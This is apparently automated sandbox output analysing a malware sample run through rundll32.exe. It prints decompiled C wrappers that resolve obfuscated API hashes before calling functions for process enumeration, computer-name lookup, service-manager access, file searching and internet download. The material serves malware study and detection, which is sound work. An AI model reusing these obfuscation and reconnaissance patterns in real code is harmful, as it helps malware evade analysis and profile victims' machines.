                                          0x00215fe5
                                          0x00215ffc
                                          0x00215fff
                                          0x00216006
                                          0x0021600d
                                          0x0021601a
                                          0x00216025
                                          0x0021602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2536 Parent PID: 2204 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 006F75AE, Relevance: 1.6, APIs: 1, Instructions: 62encryptionCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006F75AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E006F602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E007007A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}












                                          0x006f75b7
                                          0x006f75d8
                                          0x006f75dd
                                          0x006f75e7
                                          0x006f75f2
                                          0x006f75f7
                                          0x006f75fc
                                          0x006f7603
                                          0x006f760a
                                          0x006f7611
                                          0x006f761b
                                          0x006f7623
                                          0x006f762b
                                          0x006f763f
                                          0x006f765c
                                          0x006f7662

                                          APIs
                                          • CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 006F765C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CryptDecodeObject
                                          • String ID:
                                          • API String ID: 1207547050-0
                                          • Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                          • Instruction ID: a89292fdf5a199d7fefa67f9df21fb2badbd10d28f7ef3836ca882df8b70b7c3
                                          • Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                          • Instruction Fuzzy Hash: 0221087290060CFFDF05CF94DC46DDE7F76EB49324F148148FA18661A0D7B69A61AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F109C, Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E006F109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006F602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E007007A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}












                                          0x006f10a3
                                          0x006f10a6
                                          0x006f10a8
                                          0x006f10ab
                                          0x006f10ae
                                          0x006f10b1
                                          0x006f10b3
                                          0x006f10b8
                                          0x006f10bf
                                          0x006f10c8
                                          0x006f10cf
                                          0x006f10d6
                                          0x006f10dd
                                          0x006f10e4
                                          0x006f10eb
                                          0x006f10f4
                                          0x006f10fc
                                          0x006f110f
                                          0x006f1112
                                          0x006f111f
                                          0x006f112b
                                          0x006f1131

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,BB59839D), ref: 006F112B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                          • Instruction ID: 2833ff0a0e778c1700799acb56a24678d55fc28fba086e9778bf4457788f5c4f
                                          • Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                          • Instruction Fuzzy Hash: 821157B5D01208FBDF04EFA8D90A9DEBFB6EF45314F208198E9086B251D7B54B249B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0070023A, Relevance: 1.5, APIs: 1, Instructions: 42filenetworkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0070023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E007007A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}








                                          0x0070023d
                                          0x0070023e
                                          0x00700240
                                          0x00700243
                                          0x00700245
                                          0x00700248
                                          0x0070024b
                                          0x0070024e
                                          0x00700252
                                          0x00700253
                                          0x00700258
                                          0x00700262
                                          0x0070026e
                                          0x00700275
                                          0x0070028c
                                          0x0070028f
                                          0x00700296
                                          0x0070029d
                                          0x007002aa
                                          0x007002bc
                                          0x007002c2

                                          APIs
                                          • InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 007002BC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileInternetRead
                                          • String ID:
                                          • API String ID: 778332206-0
                                          • Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                          • Instruction ID: e98caee041750c67ac29b1349b43deb0a0e854c74273d9df42a6a2816dc44841
                                          • Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                          • Instruction Fuzzy Hash: 50014C75901208FFEF45EF94D9068DEBFB9EF45314F108188F90466261D7729F61AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F1C88, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E006F1C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E007007A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}









                                          0x006f1c8f
                                          0x006f1c9d
                                          0x006f1ca0
                                          0x006f1ca3
                                          0x006f1ca6
                                          0x006f1ca7
                                          0x006f1cae
                                          0x006f1cb5
                                          0x006f1cbc
                                          0x006f1cc3
                                          0x006f1cd6
                                          0x006f1cd9
                                          0x006f1ce6
                                          0x006f1cf3
                                          0x006f1cf9

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 006F1CF3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3332741929-0
                                          • Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                          • Instruction ID: 68c55c71bdf03de0f4acf2f8e245a611d70fcc5f54f6e55e25240f323c65c46c
                                          • Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                          • Instruction Fuzzy Hash: 22F01971E01208FBFB04DFA8CD4A69EBBB6EF94704F208099A5006B291DBB55F158A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F5A52, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54networkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E006F5A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E006F602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E007007A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}










                                          0x006f5a5d
                                          0x006f5a5f
                                          0x006f5a60
                                          0x006f5a63
                                          0x006f5a66
                                          0x006f5a69
                                          0x006f5a6c
                                          0x006f5a6f
                                          0x006f5a70
                                          0x006f5a71
                                          0x006f5a72
                                          0x006f5a77
                                          0x006f5a86
                                          0x006f5a91
                                          0x006f5a99
                                          0x006f5a9a
                                          0x006f5aa1
                                          0x006f5aa5
                                          0x006f5aac
                                          0x006f5ab0
                                          0x006f5ab7
                                          0x006f5abe
                                          0x006f5ac5
                                          0x006f5ad2
                                          0x006f5ae1
                                          0x006f5ae9

                                          APIs
                                          • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 006F5AE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: J5
                                          • API String ID: 2038078732-3088381744
                                          • Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                          • Instruction ID: 7550e5c382ccda6953eec96be1209e4798b8e6bd28c3002e36d84a37f66a8182
                                          • Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                          • Instruction Fuzzy Hash: 55113C7290060CFFEB05DF98DD859DFBB79EF54358F104098FA0562120D3B64E659BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E006F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006F602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E007007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x006f295f
                                          0x006f2964
                                          0x006f2967
                                          0x006f296a
                                          0x006f296d
                                          0x006f296e
                                          0x006f296f
                                          0x006f2977
                                          0x006f2985
                                          0x006f298a
                                          0x006f2992
                                          0x006f299a
                                          0x006f29a2
                                          0x006f29a9
                                          0x006f29b0
                                          0x006f29b7
                                          0x006f29bb
                                          0x006f29cf
                                          0x006f29dc
                                          0x006f29e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006F29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                          • Instruction ID: ca49cc186a24874a8e9dd37eb638a22a582d058c2f3682b599a27c4a55f591cd
                                          • Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                          • Instruction Fuzzy Hash: 8D018072A00108BFEB14DF95DC0A8DFBFB6EF45310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006FC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006F602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E007007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x006fc6e1
                                          0x006fc6e6
                                          0x006fc6f0
                                          0x006fc6fc
                                          0x006fc703
                                          0x006fc706
                                          0x006fc70d
                                          0x006fc711
                                          0x006fc715
                                          0x006fc71c
                                          0x006fc723
                                          0x006fc72a
                                          0x006fc731
                                          0x006fc738
                                          0x006fc751
                                          0x006fc762
                                          0x006fc768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006FC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                          • Instruction ID: dd0eea230056572eb473f0df6e18c6c0daa3df0761a2dde7f723cd6a2fbc1d49
                                          • Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                          • Instruction Fuzzy Hash: BF1122B290122DBBCB259F94DD498EFBEB9EF05714F108188B90962210D7714A659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006FF74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006FF74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E006F602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E007007A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}











                                          0x006ff757
                                          0x006ff765
                                          0x006ff76a
                                          0x006ff774
                                          0x006ff782
                                          0x006ff787
                                          0x006ff78f
                                          0x006ff793
                                          0x006ff79a
                                          0x006ff7ac
                                          0x006ff7af
                                          0x006ff7b6
                                          0x006ff7c3
                                          0x006ff7d1
                                          0x006ff7d7

                                          APIs
                                          • ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 006FF7D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: G
                                          • API String ID: 2681117516-4236931613
                                          • Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                          • Instruction ID: de5cf91fb3bea798d144b2f008652d7316fb4325879f7076a627beac4b0b7001
                                          • Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                          • Instruction Fuzzy Hash: 6A015771900208FBEB04DF94DD0AA9EBFB5EF85310F208188F50866290E6B55B20DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F76F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E006F76F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006F602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E007007A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}












                                          0x006f76fe
                                          0x006f7701
                                          0x006f7703
                                          0x006f7706
                                          0x006f7707
                                          0x006f7708
                                          0x006f770d
                                          0x006f7714
                                          0x006f771d
                                          0x006f7724
                                          0x006f7730
                                          0x006f7738
                                          0x006f7740
                                          0x006f7747
                                          0x006f774e
                                          0x006f7755
                                          0x006f7764
                                          0x006f7767
                                          0x006f7774
                                          0x006f7780
                                          0x006f7786

                                          APIs
                                          • Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 006F7780
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FirstProcess32
                                          • String ID: nS8U
                                          • API String ID: 2623510744-2564412997
                                          • Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                          • Instruction ID: 9dc8b071e4baa91c06ca8dc26cc31ae2171195057edf3fa02a9277806aa4c957
                                          • Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                          • Instruction Fuzzy Hash: CD0169B5D01208FBDB04DF94D90A9DEBFB5EF40314F208089E8186B251E7B55B249B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E006F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006F602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E007007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x006f1006
                                          0x006f1009
                                          0x006f100c
                                          0x006f1011
                                          0x006f1016
                                          0x006f101d
                                          0x006f1026
                                          0x006f102d
                                          0x006f1034
                                          0x006f103b
                                          0x006f1047
                                          0x006f104f
                                          0x006f1057
                                          0x006f105e
                                          0x006f1065
                                          0x006f106c
                                          0x006f1073
                                          0x006f1077
                                          0x006f108b
                                          0x006f1096
                                          0x006f109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 006F1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                          • Instruction ID: 587de7aef1136b13a0e4d14e584ee3088e41f238e0c91bac3239a2f418fbb1e6
                                          • Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                          • Instruction Fuzzy Hash: F5016DB6D0130CFBDF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E006F602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006F602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E007007A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}












                                          0x006f6033
                                          0x006f6036
                                          0x006f6038
                                          0x006f603b
                                          0x006f603c
                                          0x006f603d
                                          0x006f6042
                                          0x006f6049
                                          0x006f6055
                                          0x006f605c
                                          0x006f6063
                                          0x006f606a
                                          0x006f6081
                                          0x006f6084
                                          0x006f608b
                                          0x006f6092
                                          0x006f6099
                                          0x006f60a6
                                          0x006f60b2
                                          0x006f60b8

                                          APIs
                                          • GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 006F60B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ComputerName
                                          • String ID: /Fq
                                          • API String ID: 3545744682-1299280358
                                          • Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                          • Instruction ID: 5966c971216788094b4e71c1a53ec5b67ecd980920b5e1644b8d3dfe1cb288ed
